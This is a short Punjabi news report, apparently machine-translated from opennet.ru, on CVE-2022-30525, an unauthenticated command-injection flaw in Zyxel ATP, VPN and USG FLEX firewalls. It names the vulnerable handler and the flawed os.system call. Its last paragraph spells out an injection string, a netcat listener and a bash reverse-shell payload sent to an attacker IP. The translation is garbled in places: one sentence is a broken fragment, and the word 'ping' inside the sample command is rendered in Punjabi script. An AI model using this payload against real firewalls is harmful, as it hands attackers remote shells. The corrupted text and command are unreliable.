Zyxel ਫਾਇਰਵਾਲਾਂ ਵਿੱਚ ਕਮਜ਼ੋਰੀ ਜੋ ਪ੍ਰਮਾਣਿਕਤਾ ਤੋਂ ਬਿਨਾਂ ਕੋਡ ਨੂੰ ਚਲਾਉਣ ਦੀ ਆਗਿਆ ਦਿੰਦੀ ਹੈ

ATP, VPN ਅਤੇ USG FLEX ਸੀਰੀਜ਼ ਦੇ Zyxel ਡਿਵਾਈਸਾਂ ਵਿੱਚ ਇੱਕ ਨਾਜ਼ੁਕ ਕਮਜ਼ੋਰੀ (CVE-2022-30525) ਦੀ ਪਛਾਣ ਕੀਤੀ ਗਈ ਹੈ, ਜੋ ਕਿ ਉੱਦਮਾਂ ਵਿੱਚ ਫਾਇਰਵਾਲਾਂ, IDS ਅਤੇ VPN ਦੇ ਸੰਚਾਲਨ ਨੂੰ ਸੰਗਠਿਤ ਕਰਨ ਲਈ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਹੈ, ਜੋ ਇੱਕ ਬਾਹਰੀ ਹਮਲਾਵਰ ਨੂੰ ਕੋਡ ਨੂੰ ਚਲਾਉਣ ਦੀ ਆਗਿਆ ਦਿੰਦਾ ਹੈ। ਪ੍ਰਮਾਣਿਕਤਾ ਤੋਂ ਬਿਨਾਂ ਉਪਭੋਗਤਾ ਅਧਿਕਾਰਾਂ ਤੋਂ ਬਿਨਾਂ ਡਿਵਾਈਸ। ਹਮਲਾ ਕਰਨ ਲਈ, ਹਮਲਾਵਰ ਨੂੰ HTTP/HTTPS ਪ੍ਰੋਟੋਕੋਲ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਡਿਵਾਈਸ ਨੂੰ ਬੇਨਤੀਆਂ ਭੇਜਣ ਦੇ ਯੋਗ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ। Zyxel ਨੇ ZLD 5.30 ਫਰਮਵੇਅਰ ਅਪਡੇਟ ਵਿੱਚ ਕਮਜ਼ੋਰੀ ਨੂੰ ਠੀਕ ਕੀਤਾ ਹੈ। ਸ਼ੋਡਨ ਸੇਵਾ ਦੇ ਅਨੁਸਾਰ, ਗਲੋਬਲ ਨੈੱਟਵਰਕ 'ਤੇ ਵਰਤਮਾਨ ਵਿੱਚ 16213 ਸੰਭਾਵੀ ਤੌਰ 'ਤੇ ਕਮਜ਼ੋਰ ਉਪਕਰਣ ਹਨ ਜੋ HTTP/HTTPS ਦੁਆਰਾ ਬੇਨਤੀਆਂ ਨੂੰ ਸਵੀਕਾਰ ਕਰਦੇ ਹਨ।

ਓਪਰੇਸ਼ਨ ਵੈੱਬ ਹੈਂਡਲਰ /ztp/cgi-bin/handler ਨੂੰ ਵਿਸ਼ੇਸ਼ ਤੌਰ 'ਤੇ ਡਿਜ਼ਾਈਨ ਕੀਤੀਆਂ ਕਮਾਂਡਾਂ ਭੇਜ ਕੇ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਬਿਨਾਂ ਪ੍ਰਮਾਣਿਕਤਾ ਦੇ ਪਹੁੰਚਯੋਗ। ਇਹ ਸਮੱਸਿਆ lib_wan_settings.py ਲਾਇਬ੍ਰੇਰੀ ਵਿੱਚ ਵਰਤੀ ਗਈ os.system ਕਾਲ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਸਿਸਟਮ ਉੱਤੇ ਕਮਾਂਡਾਂ ਨੂੰ ਚਲਾਉਣ ਵੇਲੇ ਅਤੇ setWanPortSt ਓਪਰੇਸ਼ਨ ਦੀ ਪ੍ਰਕਿਰਿਆ ਕਰਨ ਵੇਲੇ ਲਾਗੂ ਕਰਨ ਵੇਲੇ ਬੇਨਤੀ ਪੈਰਾਮੀਟਰਾਂ ਦੀ ਸਹੀ ਸਫਾਈ ਦੀ ਘਾਟ ਕਾਰਨ ਹੁੰਦੀ ਹੈ।

ਉਦਾਹਰਨ ਲਈ, ਇੱਕ ਹਮਲਾਵਰ ਸਤਰ ਪਾਸ ਕਰ ਸਕਦਾ ਹੈ “; ਪਿੰਗ 192.168.1.210;" ਜੋ ਸਿਸਟਮ ਉੱਤੇ "ਪਿੰਗ 192.168.1.210" ਕਮਾਂਡ ਨੂੰ ਲਾਗੂ ਕਰਨ ਦੀ ਅਗਵਾਈ ਕਰੇਗਾ। ਕਮਾਂਡ ਸ਼ੈੱਲ ਤੱਕ ਪਹੁੰਚ ਪ੍ਰਾਪਤ ਕਰਨ ਲਈ, ਤੁਸੀਂ ਆਪਣੇ ਸਿਸਟਮ ਉੱਤੇ “nc -lvnp 1270” ਚਲਾ ਸਕਦੇ ਹੋ, ਅਤੇ ਫਿਰ '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’।

ਸਰੋਤ: opennet.ru